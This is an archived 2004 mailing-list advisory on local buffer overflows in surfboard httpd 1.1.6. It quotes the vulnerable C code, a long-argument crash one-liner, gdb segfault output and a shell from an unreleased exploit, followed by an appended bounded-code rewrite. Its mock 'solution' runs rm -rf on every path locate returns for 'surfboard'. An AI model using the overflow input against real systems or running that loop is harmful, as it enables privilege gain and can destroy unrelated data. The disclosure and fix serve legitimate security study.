Date: Tue, 11 May 2004 22:19:01 +0200 (CEST)
From: Anonymous <nobody@...anoici.org>
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com
Subject: surfboard1.1.6 local exploit.


Nothing Special, just a local overflow issue:

Fluffy, the black security kat presents:
Surfboard httpd local overflows

Problem Description:

Due to a lazy programmer, fluffy can exploit several flaws in surfboard httpd to gain new shell, yippee.

Technical Details:
                                                                                                     
                                                                                                     
from surfboard.c line 31:
--------------------------------------------------------
/* This can be overridden from the command line */
char conffile[1024] = "/etc/surfboard/surfboard.conf";
                                                                                 
/* All of these can be overridden from the config file */
char docroot[1024] = "/pub";
char logfile[1024] = "/var/log/surfboard/httpd.log";
char mimefile[1024] = "/etc/surfboard/mime.conf";
char mime_default[512] = "text/plain";
char dirindex[1024] = "index.html";
                                                                                                     
--------------------------------------------------------
                                                                                                     
                                                                                                     
from surfboard.c line 66 :
--------------------------------------------------------
main(int argc, char * argv[])
{
  int s, a;
                                                                                 
  if(argc>1) { strcpy(conffile, argv[1]); }  [1]
                                                                                 
  readconf();      [2]
                                                                                 
  log_msg(LOG_MSG, "Surfboard started");
                                                                                 
  if((s=setupsock())<0)
  {
    log_msg(LOG_ERR, "Could not open socket");
    perror("Could not open socket");
--------------------------------------------------------
                                                                                                     
                                                                                                     
[1] Nasty cracker can happily pass a long argument on cmd line to cause buffer overflow.
    A simple attack: ./surfd /etc/`perl -e 'printf "A"x2212'`
                                                                                                     

[2] readconf routine is buggy and can be overflowed:
                                                                                                     
from surfboard.c line 605:
--------------------------------------------------------
void readconf(void)
{
  FILE * conf;
  char cmd[512];
  char buf[1600];
                                                                                 
  sprintf(buf, "Reading config from file \"%s\"", conffile);
  log_msg(LOG_DEBUG, buf);
                                                                                 
                                                                                 
  if((conf=fopen(conffile, "r"))==NULL)
  {
    sprintf(buf, "Could not open config file \"%s\"", conffile);
    log_msg(LOG_ERR, buf);
    fprintf(stderr, "%s\n", buf);
    exit(1);
  }
  while(1)
  {
    fscanf(conf, " %s ", cmd);
    if(feof(conf)) { break; }
    if(cmd[0]=='#') { while(getc(conf)!='\n'); continue; }
                                                                                 
    if(!strcmp(cmd, "Port"))
    {
     fscanf(conf, " %d", &myport);
      continue;
    }
                                                                                 
    if(!strcmp(cmd, "DocRoot"))
    {
      fscanf(conf, " %s", docroot);
      continue;
    }
                                                                                                     
     ..Same style of code to get our options from config file..
--------------------------------------------------------
                                                                                 
fluffy found that if he built a fake config file, and fired up surfboard with that
config file, overflow will occur:
                                                                                                     
bash-2.05b$ gdb surfd
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r /home/deadbeat/surfboard.conf
Starting program: /home/deadbeat/security/research/archive/surfboard/surfd /home/deadbeat/surfboard.conf
Program received signal SIGSEGV, Segmentation fault.
do_lookup_versioned (undef_name=0x40034fbf "free", hash=448693,
    ref=0x40030a18, result=0xbfffed34, scope=0x300, i=0, version=0x40158020,
    skip=0x0, type_class=1) at do-lookup.h:81
81      do-lookup.h: No such file or directory.
        in do-lookup.h
                                                                                                     
                                                                                                     
Exploits:
                                                                                                     
Fluffy doesn't need to release exploits as anyone reading this should be able to
build an exploit based on information provided by fluffy :)
                                                                                                     
bash-2.05b$ ./surfex
Shellc0de is at: 0xbfffffb4
sh-2.05b$
                                                                                                     
                                                                                                     

Solution:
                                                                                                     
fluffy has written a great cmd line hack to solve the problem:
                                                                                                     
for i in `locate surfboard`; do rm -rf $i ; done
                                                                                                     
Should do the trick ;)
                                                                                                     


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
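For reference, a bounded rewrite of the two copies the post marks [1] and [2]. This is an added example, not code from the post or from the surfboard project: the function names, the `-1` error convention and the line-oriented `sscanf` parsing (surfboard itself uses `fscanf` on the open file) are assumptions, and the buffer sizes are the ones quoted from surfboard.c above.

```c
/* Added example (not surfboard's code): bounded replacements for the
 * unbounded strcpy() and " %s" reads quoted in the advisory.
 * Function names and line-based parsing are assumptions. */
#include <stdio.h>
#include <string.h>

#define CONFFILE_LEN 1024
#define DOCROOT_LEN  1024
#define CMD_LEN       512
/* scanf widths exclude the NUL, so they are one less than the buffers */
#define CMD_WIDTH     "511"
#define DOCROOT_WIDTH "1023"

static char conffile[CONFFILE_LEN] = "/etc/surfboard/surfboard.conf";
static char docroot[DOCROOT_LEN]   = "/pub";
static int  myport = 80;

/* [1] strcpy(conffile, argv[1]) has no bound. Refuse an argument that does
 * not fit instead of writing past the array. Returns 0 or -1. */
int set_conffile(const char *arg)
{
    size_t n = strlen(arg);
    if (n >= CONFFILE_LEN)
        return -1;                 /* 1023 chars is the longest we hold */
    memcpy(conffile, arg, n + 1);
    return 0;
}

/* [2] readconf()'s " %s" has no width; a width directive bounds the write.
 * Handles one config line such as "DocRoot /pub". Returns 1 if applied,
 * 0 for blank/comment/unknown lines, -1 if a value was too long. */
int apply_config_line(const char *line)
{
    char cmd[CMD_LEN], value[DOCROOT_LEN];
    if (sscanf(line, " %" CMD_WIDTH "s", cmd) != 1 || cmd[0] == '#')
        return 0;
    if (strcmp(cmd, "Port") == 0)
        return sscanf(line, " %*s %d", &myport) == 1 ? 1 : 0;
    if (strcmp(cmd, "DocRoot") == 0) {
        if (sscanf(line, " %*s %" DOCROOT_WIDTH "s", value) != 1)
            return 0;
        if (strlen(value) >= DOCROOT_LEN - 1)
            return -1;             /* filled the whole width: cut off */
        strcpy(docroot, value);    /* safe: value is shorter than docroot */
        return 1;
    }
    return 0;
}

const char *get_docroot(void) { return docroot; }
int get_port(void) { return myport; }
```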